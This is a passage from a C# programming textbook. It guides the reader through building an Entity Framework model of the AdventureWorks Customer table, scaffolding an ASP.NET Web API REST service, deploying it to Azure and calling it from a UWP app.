9. Click Save. Verify that the message “Successfully updated server
firewall rules” appears, and then click OK.
Note These steps are important. Without them, you will not be able
to connect to the database from applications running on your
computer. You can also create firewall rules that span a range of IP
addresses if you need to open access to a set of computers.
The sample AdventureWorks database contains a table named Customer
in the SalesLT schema. This table includes the columns containing the data
presented by the Customers UWP app and also several others. Using the
Entity Framework, you can choose to ignore columns that are not relevant,
but you will not be able to create new customers if any of the columns you
ignore do not allow nulls and do not have default values. In the Customer
table, this restriction applies to the NameStyle, PasswordHash, and
PasswordSalt columns (used for encrypting users’ passwords). To avoid
complications and to enable you to focus on the functionality of the app
itself, in the next exercise you will remove these columns from the Customer
table.
Remove unneeded columns from the AdventureWorks database
1. In the Azure portal, in the left pane, click All Resources, and then click
the AdventureWorks database.
2. In the toolbar above the AdventureWorks SQL Database pane, click
Tools, and then click Open In Visual Studio.
3. In the Open In Visual Studio pane, click Open In Visual Studio.
4. If the Did You Mean To Switch Applications? message appears, click
Yes.
Visual Studio will start up and prompt you to connect to the database.
5. In the Connect dialog box, enter the administrator password that you
specified earlier, and then click Connect.
Visual Studio connects to the database, which appears in the SQL Server
Object Explorer window on the left side of the Visual Studio IDE.
6. In the SQL Server Object Explorer pane, expand the AdventureWorks
database, expand Tables, expand SalesLT.Customer, and then expand
Columns.
The columns in the table are listed. The three columns that are not used
by the application and that disallow null values must be removed.
7. Click the NameStyle column, press the Ctrl key, and then click the
PasswordHash and PasswordSalt columns. Right-click the PasswordSalt
column, and then click Delete.
8. Visual Studio analyzes these columns. In the Preview Database Updates
dialog box, it displays a list of warnings and other issues that could
occur if the columns are removed.
9. In the Preview Database Updates dialog box, click Update Database.
10. Close the SQL Server Object Explorer pane, but leave Visual Studio
2017 open.
Creating an entity model
Now that you have created the AdventureWorks database in the cloud, you
can use the Entity Framework to create an entity model that an app can use to
query and update information in this database. If you have worked with
databases in the past, you might be familiar with technologies such as
ADO.NET, which provides a library of classes that you can use to connect to
a database and run SQL commands. ADO.NET is useful, but it requires that
you have a decent understanding of SQL, and if you are not careful, it can
force you into structuring your code around the logic necessary to perform
SQL commands instead of focusing on the business operations of your app.
The Entity Framework provides a level of abstraction that reduces the
dependencies that your apps have on SQL.
Essentially, the Entity Framework implements a mapping layer between a
relational database and your app; it generates an entity model that consists of
collections of objects that your app can use just as it would any other
collection. A collection typically corresponds to a table in the database, and
each row in a table corresponds to an item in the collection. You perform
queries by iterating through the items in a collection, usually with Language-
Integrated Query (LINQ). Behind the scenes, the entity model converts your
queries into SQL SELECT commands that fetch the data. You can modify the
data in the collection, and then you can arrange for the entity model to
generate and perform the appropriate SQL INSERT, UPDATE, and DELETE
commands to perform the equivalent operations in the database. In short, the
Entity Framework is an excellent vehicle for connecting to a database and
retrieving and managing data without requiring you to embed SQL
commands in your code.
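For example, the following fragment is a minimal sketch of this pattern. It assumes the AdventureWorksEntities context and Customers entity set that you will generate later in this chapter; the query and phone number are illustrative only:

using (var db = new AdventureWorksEntities())
{
    // A LINQ query over the Customers entity set. The Entity Framework
    // translates this into a SQL SELECT command when the query is enumerated.
    var gees = from c in db.Customers
               where c.LastName == "Gee"
               orderby c.FirstName
               select c;

    foreach (Customer customer in gees)
    {
        customer.Phone = "245-555-0199"; // modify the tracked object
    }

    // The entity model generates the corresponding SQL UPDATE commands.
    db.SaveChanges();
}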
In the following exercise, you will create a very simple entity model for
the Customer table in the AdventureWorks database. You will follow what is
known as the database-first approach to entity modeling. In this approach,
the Entity Framework generates classes based on the definitions of tables in
the database. The Entity Framework also provides a code-first approach; that
strategy can generate a set of tables in a database based on classes that you
have implemented in your app.
Note If you want more information about the code-first approach to
creating an entity model, see “Code First to an Existing Database” on
the Microsoft website at http://msdn.microsoft.com/data/jj200620.
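By way of contrast, a code-first model starts from ordinary classes, and the Entity Framework creates the matching tables. The following sketch is illustrative only; this chapter uses the database-first approach:

// Code-first sketch: the Entity Framework generates a Customers table
// from this context and entity class, rather than the other way around.
public class Customer
{
    public int CustomerID { get; set; }
    public string FirstName { get; set; }
    public string LastName { get; set; }
}

public class CustomerContext : DbContext
{
    public DbSet<Customer> Customers { get; set; }
}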
Create the AdventureWorks entity model
1. In Visual Studio, open the Customers solution, located in the \Microsoft
Press\VCSBS\Chapter 27\Web Service folder in your Documents
folder.
This project contains a modified version of the Customers app from
Chapter 26. The ViewModel implements additional commands, which
let a user navigate to the first or last customer in the customers
collection, and the command bar contains First and Last buttons that
invoke these commands. Additionally, the Cortana search functionality
has been removed to enable you to focus on the tasks at hand. (You are
more than welcome to add this feature back if you want a voice-
activated version of the app.)
2. In Solution Explorer, right-click the Customers solution (not the
Customers project), point to Add, and then click New Project.
3. In the Add New Project dialog box, in the left pane, click the Web node.
In the middle pane, click the ASP.NET Web Application template (make
sure that you don’t accidentally select the ASP.NET Core Web
Application template). In the Name box, type
AdventureWorksService, and then click OK.
4. In the New ASP.NET Web Application - AdventureWorksService
dialog box, click Azure API App, verify that the Web API check box is
selected, and then click OK.
As mentioned at the start of this section, you cannot access a relational
database directly from a UWP app, including when you use the Entity
Framework. Instead, you have created an Azure API app (this is not a
UWP app), and you will host the entity model that you create in this
app. The Azure API App template enables you to build a web service
that you can host by using Azure and to which client applications can connect
quickly and easily. The Web API elements provide additional wizards
and tools with which you can quickly create the code for the web
service, which is what you will do in the next exercise. This web service
will provide remote access to the entity model for the Customers UWP
app.
5. In Solution Explorer, right-click the AdventureWorksService project,
and then click Properties.
6. On the Properties page, click the Web tab in the left column.
7. On the Web page, click “Don’t open a page. Wait for a request from an
external application.”
Normally, when you run a web app from Visual Studio, the web browser
(Microsoft Edge) opens and attempts to display the home page for the
app. But the AdventureWorksService app does not have a home page;
the purpose of this app is to host the web service to which client apps
can connect and retrieve data from the AdventureWorks database.
8. In the Project Url box, change the address of the web app to
http://localhost:50000/, and then click Create Virtual Directory. In the
Microsoft Visual Studio message box that appears, verify that the virtual
directory was created successfully, and then click OK.
By default, the ASP.NET project template creates a web app that is
hosted with IIS Express, and it selects a random port for the URL. This
configuration sets the port to 50000 so that the subsequent steps in the
exercises in this chapter can be described more easily.
9. On the File menu, click Save All, and then close the Properties page.
10. In Solution Explorer, in the AdventureWorksService project, right-click
the Models folder, point to Add, and then click New Item.
11. In the Add New Item - AdventureWorksService dialog box, in the left
column, click the Data node. In the middle pane, click the ADO.NET
Entity Data Model template. In the Name box, type
AdventureWorksModel, and then click Add.
The Entity Data Model Wizard starts. You can use this wizard to
generate an entity model from an existing database.
12. On the Choose Model Contents page of the wizard, click EF Designer
From Database, and then click Next.
13. On the Choose Your Data Connection page, click New Connection.
14. If the Choose Data Source dialog box appears, select Microsoft SQL
Server in the Data Source box, and then click Continue.
Note The Choose Data Source dialog box appears only if you have
not previously used the Data Connection wizard and selected a
data source.
In the Connection Properties dialog box, in the Server Name box, type
the following: tcp:<servername>.database.windows.net,1433, where
<servername> is the unique name of the Azure SQL Database server
that you created in the previous exercise. Click Use SQL Server
Authentication and enter the name and password that you specified for
the administrator login in the previous exercise. Click Save my
Password. In the Select Or Enter A Database Name box, type
AdventureWorks, and then click OK.
This action creates a connection to the AdventureWorks database
running in Azure.
15. On the Choose Your Data Connection page, click No, Exclude Sensitive
Data From The Connection String. I Will Set It In My Application
Code. Verify that Save Connection Settings In Web.Config As is
selected, and then confirm that the name of the connection string is
AdventureWorksEntities. Click Next.
16. On the Choose Your Version page, select Entity Framework 6.x, and
then click Next.
17. On the Choose Your Database Objects And Settings page, expand
Tables, expand SalesLT, and then select Customer. Verify that the
Pluralize Or Singularize Generated Object Names check box is selected.
(The other two options on this page will also be selected by default.)
Observe that the Entity Framework generates the classes for the entity
model in the AdventureWorksModel namespace, and then click Finish.
The Entity Data Model Wizard generates an entity model for the
Customer table and displays a graphical representation in the Entity
Model editor on the screen.
If the following Security Warning message box appears, select the Do
Not Show This Message Again check box, and then click OK. This
security warning appears because the Entity Framework uses a
technology known as T4 templates to generate the code for your entity
model, and it has downloaded these templates from the web by using
NuGet. The Entity Framework templates have been verified by
Microsoft and are safe to use.
18. In the Entity Model editor, right-click the MiddleName column and then
click Delete From Model. Using the same process, delete the Suffix,
CompanyName, and SalesPerson columns from the entity model.
The Customers app does not use these columns, and there is no need to
retrieve them from the database. They allow null values, so they can
safely be left as part of the database table. However, you should not
remove the rowguid and ModifiedDate columns. These columns are
used by the database to identify rows in the Customer table and track
changes to these rows in a multiuser environment. If you remove these
columns, you will not be able to save data back to the database correctly.
19. On the Build menu, click Build Solution.
20. In Solution Explorer, in the AdventureWorksService project, expand the
Models folder, expand AdventureWorksModel.edmx, expand
AdventureWorksModel.tt, and then double-click Customer.cs.
This file contains the class that the Entity Data Model Wizard generates
to represent a customer. This class contains automatic properties for
each of the columns in the Customer table that you have included in the
entity model:
public partial class Customer
{
    public int CustomerID { get; set; }
    public string Title { get; set; }
    public string FirstName { get; set; }
    public string LastName { get; set; }
    public string EmailAddress { get; set; }
    public string Phone { get; set; }
    public System.Guid rowguid { get; set; }
    public System.DateTime ModifiedDate { get; set; }
}
21. In Solution Explorer, under the entry for AdventureWorksModel.edmx,
expand AdventureWorksModel.Context.tt, and then double-click
AdventureWorksModel.Context.cs.
This file contains the definition of a class called
AdventureWorksEntities. (It has the same name as you used when you
generated the connection to the database in the Entity Data Model
Wizard.)
public partial class AdventureWorksEntities : DbContext
{
    public AdventureWorksEntities()
        : base("name=AdventureWorksEntities")
    {
    }

    protected override void OnModelCreating(DbModelBuilder modelBuilder)
    {
        throw new UnintentionalCodeFirstException();
    }

    public DbSet<Customer> Customers { get; set; }
}
The AdventureWorksEntities class is descended from the DbContext
class, and this class provides the functionality that an app uses to
connect to the database. The default constructor passes a parameter to
the base-class constructor that specifies the name of the connection
string to use to connect to the database. If you look in the web.config
file, you will find this string in the <ConnectionStrings> section. It
contains the parameters (among other things) that you specified when
you ran the Entity Data Model Wizard. However, this string does not
contain the password information required to authenticate the
connection because you elected to provide this data at runtime. You will
handle this in the following steps.
You can ignore the OnModelCreating method in the
AdventureWorksEntities class. The only other item is the Customers
collection. This collection has the type DbSet<Customer>. The DbSet
generic type provides methods with which you can add, insert, delete,
and query objects in a database. It works in conjunction with the
DbContext class to generate the appropriate SQL SELECT commands
necessary to fetch customer information from the database and populate
the collection. It is also used to create the SQL INSERT, UPDATE, and
DELETE commands that run if Customer objects are added, modified,
or removed from the collection. A DbSet collection is frequently
referred to as an entity set.
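As a brief sketch of how an entity set is used (the method name and the new customer shown here are illustrative only):

private async Task UpdateCustomersAsync()
{
    using (var db = new AdventureWorksEntities())
    {
        // Query the entity set; the DbContext issues a SQL SELECT behind the scenes.
        Customer customer = await db.Customers.FindAsync(1);

        // Add to the entity set; SaveChangesAsync generates the SQL INSERT.
        db.Customers.Add(new Customer { FirstName = "Jane", LastName = "Doe" });
        await db.SaveChangesAsync();
    }
}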
22. In Solution Explorer, right-click the Models folder, click Add, and then
click Class.
23. In the Add New Item - AdventureWorksService dialog box, ensure that
the Class template is selected. In the Name box, type
AdventureWorksEntities, and then click Add.
A new class named AdventureWorksEntities is added to the project and
is displayed in the Code and Text Editor window. This class currently
conflicts with the existing class of the same name generated by the
Entity Framework, but you will use this class to augment the Entity
Framework code by converting it to a partial class. A partial class is a
class in which the code is split across one or more source files. This
approach is useful for tools such as the Entity Framework because it
enables you to add your own code without the risk of having it
accidentally overwritten if the Entity Framework code is regenerated at
some point in the future.
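In outline, a partial class simply spreads a single class across source files. The Widget class below is an illustration only, not code from this project:

// Generated.cs -- code owned by a tool such as the Entity Framework.
public partial class Widget
{
    public int Id { get; set; }
}

// Widget.cs -- your own additions, safe from regeneration.
public partial class Widget
{
    public override string ToString() => $"Widget {Id}";
}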
24. In the Code and Text editor window, modify the definition of the
AdventureWorksEntities class to make it partial, as shown in bold in the
following.
public partial class AdventureWorksEntities
{
}
25. In the AdventureWorksEntities class, add a constructor that takes a string
parameter named password. The constructor should invoke the base-
class constructor with the name of the connection string previously
written to the web.config file by the Entity Data Model Wizard
(specified on the Choose Data Connection page).
public partial class AdventureWorksEntities
{
    public AdventureWorksEntities(string password)
        : base("name=AdventureWorksEntities")
    {
    }
}
26. Add the code shown below in bold to the constructor. This code
modifies the connection string used by the Entity Framework to include
the password. The Customers app will call this constructor and provide
the password at runtime.
public partial class AdventureWorksEntities
{
    public AdventureWorksEntities(string password)
        : base("name=AdventureWorksEntities")
    {
        this.Database.Connection.ConnectionString += $";Password={password}";
    }
}
Creating and using a REST web service
You have created an entity model that provides operations to retrieve and
maintain customer information. The next step is to implement a web service
so that a UWP app can access the entity model.
With Visual Studio 2017, you can create a web service in an ASP.NET
web app based directly on an entity model generated by the Entity
Framework. The web service uses the entity model to retrieve data from a
database and update the database. You create a web service by using the Add
Scaffold wizard. This wizard can generate a web service that implements the
REST model, which uses a navigational scheme to represent business objects
and services over a network and the HTTP protocol to transmit requests to
access these objects and services. A client app that accesses a resource
submits a request in the form of a URL, which the web service parses and
processes. For example, Adventure Works might publish customer
information, exposing the details of each customer as a single resource, by
using a scheme similar to this:
http://Adventure-Works.com/DataService/Customers/1
Accessing this URL causes the web service to retrieve the data for
customer 1. This data can be returned in a number of formats, but for
portability, the most common formats include XML and JavaScript Object
Notation (JSON). A typical JSON response generated by a REST web service
request issuing the previous query looks like this:
{
    "CustomerID":1,
    "Title":"Mr",
    "FirstName":"Orlando",
    "LastName":"Gee",
    "EmailAddress":"orlando0@adventure-works.com",
    "Phone":"245-555-0173"
}
The REST model relies on the app that accesses the data to send the
appropriate HTTP verb as part of the request to access the data. For example,
the simple request shown previously should send an HTTP GET request to
the web service. HTTP supports other verbs as well, such as POST, PUT, and
DELETE, which you can use to create, modify, and remove resources,
respectively. Writing the code to generate the appropriate HTTP requests and
parsing the responses returned by a REST web service all sounds quite
complicated. Fortunately, the Add Scaffold wizard can generate most of this
code for you.
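To give a flavor of the code that the wizard saves you from writing, the following sketch issues a GET request by hand, using HttpClient and the Json.NET parser that you will meet later in this chapter. The method name is illustrative, and the URL is the local address used by the exercises:

private async Task<Customer> FetchCustomerAsync()
{
    using (var client = new HttpClient())
    {
        // HTTP GET retrieves a resource; the response body is JSON.
        string json = await client.GetStringAsync(
            "http://localhost:50000/api/Customers/1");
        return JsonConvert.DeserializeObject<Customer>(json);
    }
}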
In the following exercise, you will create a simple REST web service for
the AdventureWorks entity model. This web service will make it possible for
a client app to query and maintain customer information.
Create the AdventureWorks web service
1. In Visual Studio, in the AdventureWorksService project, right-click the
Controllers folder, point to Add, and then click New Scaffolded Item.
2. In the Add Scaffold wizard, in the middle pane, click the Web API 2
Controller With Actions, Using Entity Framework template, and then
click Add.
3. In the Add Controller dialog box, in the Model Class drop-down list,
select Customer (AdventureWorksService.Models). In the Data Context
Class drop-down list, select AdventureWorksEntities
(AdventureWorksService.Models). Select the Use Async Controller
Actions check box. Verify that the Controller name is set to
CustomersController, and then click Add.
In a web service created by using the ASP.NET Web API template, all
incoming web requests are handled by one or more controller classes,
and each controller class exposes methods that map to the different types
of REST requests for each of the resources that the controller exposes.
For example, the CustomersController looks like this:
public class CustomersController : ApiController
{
    private AdventureWorksEntities db = new AdventureWorksEntities();

    // GET: api/Customers
    public IQueryable<Customer> GetCustomers()
    {
        return db.Customers;
    }

    // GET: api/Customers/5
    [ResponseType(typeof(Customer))]
    public async Task<IHttpActionResult> GetCustomer(int id)
    {
        Customer customer = await db.Customers.FindAsync(id);
        if (customer == null)
        {
            return NotFound();
        }

        return Ok(customer);
    }

    // PUT: api/Customers/5
    [ResponseType(typeof(void))]
    public async Task<IHttpActionResult> PutCustomer(int id, Customer customer)
    {
        if (!ModelState.IsValid)
        {
            return BadRequest(ModelState);
        }

        if (id != customer.CustomerID)
        {
            return BadRequest();
        }

        db.Entry(customer).State = EntityState.Modified;

        try
        {
            await db.SaveChangesAsync();
        }
        catch (DbUpdateConcurrencyException)
        {
            if (!CustomerExists(id))
            {
                return NotFound();
            }
            else
            {
                throw;
            }
        }

        return StatusCode(HttpStatusCode.NoContent);
    }

    // POST: api/Customers
    [ResponseType(typeof(Customer))]
    public async Task<IHttpActionResult> PostCustomer(Customer customer)
    {
        ...
    }

    // DELETE: api/Customers/5
    [ResponseType(typeof(Customer))]
    public async Task<IHttpActionResult> DeleteCustomer(int id)
    {
        ...
    }

    ...
}
The GetCustomers method handles requests to retrieve all customers,
and it satisfies this request by simply returning the entire Customers
collection from the Entity Framework data model that you created
previously. Behind the scenes, the Entity Framework fetches all the
customers from the database and uses this information to populate the
Customers collection. This method is invoked if an app sends an HTTP
GET request to the api/Customers URL in this web service.
The GetCustomer method (not to be confused with GetCustomers) takes
an integer parameter. This parameter specifies the CustomerID of a
specific customer, and the method uses the Entity Framework to find the
details of this customer before returning it. GetCustomer runs when an
app sends an HTTP GET request to the api/Customers/n URL, where n
is the ID of the customer to retrieve.
The PutCustomer method runs when an app sends an HTTP PUT
request to the web service. The request specifies a customer ID and the
details of a customer, and the code in this method uses the Entity
Framework to update the specified customer with the details. The
PostCustomer method responds to HTTP POST requests and takes the
details of a customer as its parameter. This method adds a new customer
with these details to the database (the details are not shown in the
preceding code sample). Finally, the DeleteCustomer method handles
HTTP DELETE requests and removes the customer with the specified
customer ID.
Note The code generated by the Web API template optimistically
assumes that it will always be able to connect to the database. In
the world of distributed systems, where the database and web
service are located on separate servers, this might not always be
the case. Networks are prone to transient errors and timeouts; a
connection attempt might fail because of a temporary glitch and
succeed if it is retried a short time later. Reporting a temporary
glitch to a client as an error can be frustrating to the user. If
possible, it might be better to silently retry the failing operation as
long as the number of retries is not excessive (you don’t want the
web service to freeze if the database is really unavailable). For
detailed information on this strategy, see “Cloud Service
Fundamentals Data Access Layer-Transient Fault Handling” at
http://social.technet.microsoft.com/wiki/contents/articles/18665.cloud-
service-fundamentals-data-access-layer-transient-fault-
handling.aspx.
The ASP.NET Web API template automatically generates code that
directs requests to the appropriate method in the controller classes, and
you can add more controller classes if you need to manage other
resources, such as products or orders.
Note For detailed information on implementing REST web
services by using the ASP.NET Web API template, see “Web API”
at http://www.asp.net/web-api.
You can also create controller classes manually by using the same
pattern as that shown by the CustomersController class—you do not
have to fetch and store data in a database by using the Entity
Framework. The ASP.NET Web API template contains an example
controller in the ValuesController.cs file that you can copy and augment
with your own code.
4. In the CustomersController class, modify the statement that creates the
AdventureWorksEntities context object to use the constructor that takes a
password as its parameter. As the argument to the constructor, provide
the administrator password that you specified when you created the
database. (In the following code sample, replace the string
YourPassword with your own password.)
public class CustomersController : ApiController
{
    private AdventureWorksEntities db = new
        AdventureWorksEntities("YourPassword");

    // GET: api/Customers
    public IQueryable<Customer> GetCustomers()
    {
        return db.Customers;
    }
    ...
}
Note In the real world, you should never hard-code a password in
this way. Instead, you should protect the password by storing it in
an encrypted section of the web.config file for the web service. For
more information, see Encrypting Configuration Information
Using Protected Configuration at
https://msdn.microsoft.com/library/51cdfe5b-9d82-458c-94ff-
c551c4f38ed1.
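As a hedged sketch of that alternative, you could hold the password in the <appSettings> section of web.config (the key name AdventureWorksPassword is illustrative, not one used elsewhere in this book) and then encrypt that section by using Protected Configuration:

using System.Configuration;

public class CustomersController : ApiController
{
    // Reads <add key="AdventureWorksPassword" value="..."/> from web.config
    // instead of embedding the password in source code.
    private AdventureWorksEntities db = new AdventureWorksEntities(
        ConfigurationManager.AppSettings["AdventureWorksPassword"]);
    ...
}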
5. In the Controllers folder, right-click the ValuesController.cs file, and
then click Delete. In the Message box, click OK to confirm that you
want to delete this file.
You will not be using the example ValuesController class in this
exercise.
6. In Solution Explorer, right-click the AdventureWorksService project,
point to Debug and then click Start New Instance.
This action starts the IIS Express web server, which hosts the web
service. The Diagnostic Tools pane appears in Visual Studio to indicate
that the website is running, but there is no other indication; you need to
navigate to the website by using a browser to verify that it is
functioning correctly.
7. Open Microsoft Edge, and move to the URL
http://localhost:50000/api/Customers. This address should cause the
web service to receive an HTTP GET request for customers, which
should run the GetCustomers method inside your code. The result is a
list of all customers, presented as a JSON array.
8. Change the URL to http://localhost:50000/api/Customers/5. This
causes the web service to run the GetCustomer (singular) method,
passing it the parameter 5. You should see the details for customer 5
displayed in the browser.
9. Close Microsoft Edge and return to Visual Studio.
10. On the Debug menu, click Stop Debugging.
You can now deploy the web service to Azure. You can do this by using
the Publish Web wizard available with Visual Studio 2017 to create a web
app in the cloud and upload the web service to this app.
Deploy the web service to the cloud
1. On the View menu, click Server Explorer.
2. In Server Explorer, right-click Azure, and then click Connect to
Microsoft Azure Subscription.
3. In the Sign In To Your Account dialog box, enter the name and
password for your Azure account and log in to Azure.
4. In Solution Explorer, right-click the AdventureWorksService project
and then click Publish.
The Publish Web wizard starts.
5. Under Select A Publish Target, click Microsoft Azure App Service,
click Create New, and then click Publish.
6. In the Create App Service dialog box, accept the default App Name,
select your Subscription, and set the Resource Group to awgroup (you
created this resource group earlier, using the Azure portal). Next to the
App Service Plan box, click New.
7. In the Configure App Service Plan dialog box, set the Location to your
nearest site, in the Size drop-down list box select Free, and then click
OK.
The App Service Plan determines the resources available for your API
app in the cloud. Behind the scenes, Microsoft hosts your API app on a
web server, or a web server farm, depending on the size of the plan that
you specify. If you are building a commercial application that is
intended to handle many thousands of requests a second, you will likely
require a plan that provides large-scale resources. However, you will be
charged accordingly. For this application, you should select the Free
plan, which provides limited throughput and memory, but it is fine for
prototyping and building small web services.
Important If you select a size other than Free, you will be charged
for use, and some of the app service plans can cost several hundred
dollars a month!
8. Back in the Create App Service dialog box, click Create.
The Azure API app should be deployed to the cloud. The browser
should open and display a “getting started” page that provides some
links to documentation about using Azure API apps.
9. Close the web browser and return to Visual Studio.
The next phase of this journey is to connect to the web service from the
Customers UWP app and then use the web service to fetch some data. In the
good old days, this process would involve generating HTTP REST requests,
sending them to the web service, waiting for the results, and then parsing the
data returned so that the app can display it (or handle any errors that might
have occurred). However, one of the beauties of deploying a REST web
service as an Azure API app is that Azure can generate a bunch of metadata
that describes your web service and the operations it provides. You can use
the REST API Client wizard in Visual Studio to query this metadata, and the
wizard will generate an object model that connects to the web service and
sends it requests. You use this object model to insulate your application from
the low-level details required to send and receive data across the web. As
such, you can focus on the business logic that displays and manipulates the
objects published through the web service. You will use these classes in the
following exercise. You will also use the JSON parser implemented by the
Json.NET package. You will have to add this package to the Customers
project.
Important This exercise retrieves the data for every customer. This
approach is fine for systems that utilize a small amount of data, as it
prevents repeated network access. However, in a large-scale system
(such as a multinational e-commerce application), you should be more
selective. If the database contains a large volume of data, you will likely
swamp the user’s device running the application. A better approach is to
use paging, whereby data is fetched in blocks (maybe of 200 records at
a time). The web service would need to be updated to support this
approach, and the ViewModel in the app would need to manage
fetching blocks of records transparently. This is left as an exercise for
the reader.
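If you do attempt it, one possible shape for a paged operation in the controller is shown below. This is a sketch only; the parameter names and defaults are illustrative:

// GET: api/Customers?page=1&pageSize=200
public IQueryable<Customer> GetCustomers(int page = 0, int pageSize = 200)
{
    // OrderBy is required before Skip/Take so that the Entity Framework
    // can generate a deterministic paged SQL query.
    return db.Customers
             .OrderBy(c => c.CustomerID)
             .Skip(page * pageSize)
             .Take(pageSize);
}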
Fetch data from the AdventureWorks web service
1. In Solution Explorer, in the Customers project, right-click the
DataSource.cs file and then click Delete. In the message box, click OK
to confirm that you want to delete the file.
This file contained the sample data used by the Customers app. You are
going to modify the ViewModel class to fetch this data from the web
service, so this file is no longer required.
2. Right-click the Customers project, and then click Manage NuGet
Packages.
3. In the NuGet Package Manager: Customers window, make sure that the
Filter drop-down list box is set to All, and then type Json.NET in the
search box.
4. In the pane displaying the search results, select the Newtonsoft.Json
package. In the right pane, set the Action to Install, and then click
Install.
5. In the Preview window, click OK.
6. In the License Acceptance window, review the license information, and
then click I Accept if you wish to continue (if you don’t, the package
won’t be installed and you won’t be able to complete this exercise!).
7. Wait for the package to be installed, and then close the NuGet Package
Manager: Customers window.
8. In Solution Explorer, right-click the Customers project again, point to
Add, and then click REST API Client.
This action starts the wizard that generates the object model that your
application can use to connect to the web service.
9. In the Add REST API Client window, click Select Azure Asset.
10. In the App Service window, select your Azure subscription. In the
Search box, expand the awgroup resource group, select the web service
that you created in the previous exercise, and then click OK.
11. Back in the Add REST API Client window, click OK.
Visual Studio will connect to Azure and download the metadata for the
web service, and also install several additional NuGet packages
containing libraries required to support the code generated by the
wizard. Wait for the operation to complete.
12. In Solution Explorer, you should see a new folder named after your web
service, AdventureWorksServicennnnnnnnn. Expand this folder, and
also expand the Models folder that this folder contains.
13. In the Models folder, double-click the file Customer.cs to display it in
the Code and Text Editor window. This file contains a class named
Customer, which models the data retrieved from the web service. It
contains fields and properties for each of the attributes you specified for
the Customer entity when you constructed the web service using the
Entity Framework, together with a constructor that you can use to create
a new Customer object.
14. In the AdventureWorksServicennnnnnnnn folder, double-click the
CustomersOperations.cs file and review it in the Code and Text Editor
window. This file contains the code that interacts with the various REST
operations that your UWP application uses to send and receive data from
the web service. Amongst other things, you should see static methods
named GetCustomersWithHttpMessagesAsync,
PostCustomersWithHttpMessagesAsync,
GetCustomerWithHttpMessagesAsync,
PutCustomerWithHttpMessagesAsync, and
DeleteCustomerWithHttpMessagesAsync. Each of these methods
contains the low-level code required to construct and send HTTP
requests and handle the results. You are welcome to examine this code
in detail, but it is not necessary to understand it, and you should not
change it; if you regenerate the REST web client code by using the
Visual Studio wizard later, any changes you make will be lost.
15. Double-click the CustomersOperationsExtension.cs file and view it in
the Code and Text Editor window. This file contains a series of
extension methods for the CustomerOperations class. Their purpose is
to provide a simplified programmatic API. The
CustomerOperationsExtension class has pairs of methods that wrap the
corresponding operations in the CustomerOperations class and perform
the necessary task handling and cancellation processing. For example,
the CustomerOperationsExtension class has a pair of methods named
GetCustomers, and GetCustomersAsync, both of which invoke the
GetCustomersWithHttpMessagesAsync method in the
CustomerOperations class. The Customers UWP app will make use of
these extension methods.
16. Double-click the AdventureWorksServicennnnnnnnn.cs file and view it
in the Code and Text Editor window. This file implements the
AdventureWorksServicennnnnnnnn class which you use to establish a
connection to the web service. The bulk of this class comprises a series
of public and protected constructors, which you can use to specify the
URL of the web service, security credentials, and other options.
As it stands, the web service does not implement any form of
authentication; anyone who knows the URL of the web service can send
it requests. In a real-world web service exposing company-confidential
information, this would be unacceptable. However, for this application, we
will omit this task as the web service only contains sample data.
Although the default configuration for the Azure API App is for
authentication to be disabled (see the sidebar Azure API App Security),
the public constructors for the AdventureWorksServicennnnnnnnn class
expect you to provide details that the web service can use to authenticate
you. The rationale behind this apparent anomaly is that deciding not to
use authentication in an app should be a conscious decision and not just
because you forgot to do so! However, the
AdventureWorksServicennnnnnnnn class does provide protected
constructors that do not require authentication information. You might
be tempted simply to change the access to these constructors to public so
that you can use them, but bear in mind that if you regenerate the REST
API client code, you will lose these changes (and it is also not good
practice). Instead, you should create a new class that extends
AdventureWorksServicennnnnnnnn and add a public constructor to this
class that calls the appropriate protected constructor in the
AdventureWorksServicennnnnnnnn class.
Azure API App Security
By default, when you deploy an Azure API app, authentication is
disabled, meaning that the web service exposed by the API is
available for use by anyone. You can see this in the Azure portal if
you go to your Azure API app and click the
Authentication/Authorization settings.
However, you can easily enable authentication simply by
clicking the On button. You will then be given the option of how to
authenticate users. For example, you could ask users to log in
using a Microsoft account, or through Facebook, Twitter, or
Google (you can select multiple authentication options if required).
If you are creating a corporate application, you might prefer to use
Azure Active Directory. In each case, you need to register your
application with the authentication provider and arrange how users
will be authorized once they are authenticated.
For more information, visit Authentication and authorization in
Azure App Service at https://docs.microsoft.com/en-gb/azure/app-
service/app-service-authentication-overview#what-is-app-service-
authentication--authorization.
Once you have configured authentication, when you connect to
the web service you will be prompted for your credentials using
the appropriate authentication provider. If you are building a UWP
app, you can provide these credentials to the constructor that
creates the object that connects to the web service (an instance of
the AdventureWorksServicennnnnnnnn class in the example
shown in the exercises).
17. In Solution Explorer, right-click the Customers project, point to Add,
and then click Class. In the Add New Item – Customers dialog box,
enter the name AdventureWorksService.cs, and then click Add.
18. In the Code and Text Editor window, modify the
AdventureWorksService class to inherit from the
AdventureWorksServicennnnnnnnn class, as shown below in bold:
class AdventureWorksService : AdventureWorksServicennnnnnnnn
{
}
19. Add the public constructor shown in bold in the code that follows, to the
AdventureWorksService class:
class AdventureWorksService : AdventureWorksServicennnnnnnnn
{
    public AdventureWorksService()
        : base()
    {
    }
}
This constructor actually invokes the following constructor in the
AdventureWorksServicennnnnnnnn class:
protected AdventureWorksServicennnnnnnnn(params DelegatingHandler[] handlers)
    : base(handlers)
{
    this.Initialize();
}
Remember that the params keyword specifies a parameters array. If you
pass an empty parameter list, the params array will be empty. The
Initialize method in the AdventureWorksServicennnnnnnnn class
actually does the work of initializing the settings for the connection to
the web service.
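In general terms, the params mechanism works like this (the Configure method and the handler variables are illustrative, not part of the generated client):

private void Configure(params DelegatingHandler[] handlers)
{
    // handlers is never null; calling Configure() produces an empty array.
    Console.WriteLine(handlers.Length);
}

...
Configure();                   // prints 0
Configure(handlerA, handlerB); // prints 2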
20. In Solution Explorer, double-click ViewModel to display the ViewModel
class in the Code and Text Editor window.
21. In the ViewModel constructor, comment out the code that sets the
customers field to the DataSource.Customers list, and add the following
code shown in bold:
public ViewModel()
{
    ...
    // this.customers = DataSource.Customers;
    try
    {
        AdventureWorksService service = new AdventureWorksService();
        this.customers =
            service.CustomersOperations.GetCustomers().ToList();
    }
    catch
    {
        this.customers = null;
    }
}
The customers list contains the customers displayed by the app; it was
previously populated with the data in the DataSource.cs file that you
removed. The new code creates an AdventureWorksService object that
connects to your web service. The CustomersOperations property of this
object is a reference to a CustomerOperations object, which provides the
GetCustomers method to fetch the data from the web service, as
described previously. The data is converted to a list and stored in the
customers variable. Note that if an exception occurs, the customers list
is set to null; no customers will appear.
22. On the Debug menu, click Start Debugging to build and run the app.
It will take a few moments while the application fetches the data from
